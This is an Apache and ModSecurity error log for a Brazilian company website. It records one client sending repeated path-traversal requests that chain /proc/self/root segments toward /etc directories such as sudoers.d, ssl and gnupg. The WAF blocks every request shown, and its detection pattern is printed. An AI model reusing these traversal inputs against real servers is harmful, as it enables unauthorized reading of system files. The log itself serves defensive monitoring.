[Fri Mar 20 07:49:17.131618 2026] [:error] [pid 21219:tid 140411699963648] [client 74.7.243.128:54576] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mLfXLqtnMIWvjpaKY3wAAAoU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:49:18.538510 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.243.128:54584] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mLta6ubjKNq_cu4bSbgAAA0A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:49:19.847140 2026] [:error] [pid 10189:tid 140411691570944] [client 74.7.243.128:57794] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mLzJ3M9BSuKP7CAYZdAAAAIY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:49:22.266407 2026] [:error] [pid 11642:tid 140411683178240] [client 74.7.243.128:57800] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mMrninkcc-iUj5ApdkwAAA4c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:49:23.675382 2026] [:error] [pid 7235:tid 140411607643904] [client 74.7.243.128:57808] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mM_qxLDW4GITHUkTlYQAAARA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:49:24.984461 2026] [:error] [pid 21219:tid 140411557287680] [client 74.7.243.128:57814] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mNPXLqtnMIWvjpaKY4gAAApY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:49:26.303024 2026] [:error] [pid 21219:tid 140411540502272] [client 74.7.243.128:57826] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mNvXLqtnMIWvjpaKY4wAAApg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:49:27.727357 2026] [:error] [pid 7235:tid 140411708356352] [client 74.7.243.128:57840] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mN_qxLDW4GITHUkTlZQAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:49:29.007462 2026] [:error] [pid 10189:tid 140411624429312] [client 74.7.243.128:57854] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mOTJ3M9BSuKP7CAYZfwAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:49:30.331083 2026] [:error] [pid 21219:tid 140411590858496] [client 74.7.243.128:59550] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mOvXLqtnMIWvjpaKY5QAAApI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:49:31.655434 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.243.128:59556] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mO-oXxyEfFpUF8f9_5AAAAU0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:49:32.979497 2026] [:error] [pid 31215:tid 140411548894976] [client 74.7.243.128:59564] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mPAF0L0L-SsrnPo5nowAAAtc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:49:41.539294 2026] [:error] [pid 7893:tid 140411716749056] [client 74.7.243.128:59574] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mRRCii7xarUs8iHZmFAAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:49:42.860264 2026] [:error] [pid 7893:tid 140411733534464] [client 74.7.243.128:40980] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mRhCii7xarUs8iHZmFQAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:49:42.860566 2026] [mime_magic:error] [pid 7893:tid 140411733534464] (70014)End of file found: [client 74.7.243.128:40980] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:49:44.304085 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.243.128:40984] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mSNa6ubjKNq_cu4bSegAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:49:48.577607 2026] [:error] [pid 10189:tid 140411574073088] [client 74.7.243.128:40994] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mTDJ3M9BSuKP7CAYZhwAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:50:02.376914 2026] [mime_magic:error] [pid 7235:tid 140411716749056] (70014)End of file found: [client 57.141.18.96:51506] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:50:04.623237 2026] [:error] [pid 7893:tid 140411582465792] [client 74.7.243.128:35030] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mXBCii7xarUs8iHZmJwAAAhM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:50:09.314344 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.243.128:38134] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mYda6ubjKNq_cu4bSgwAAA1M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:50:10.590619 2026] [:error] [pid 9818:tid 140411716749056] [client 74.7.243.128:58198] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mYl1pVZ5mVmJwsFMuuAAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:50:15.256670 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.243.128:58212] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mZ9a6ubjKNq_cu4bSiwAAA08"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:50:55.783132 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.243.128:58222] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mj9a6ubjKNq_cu4bS6QAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
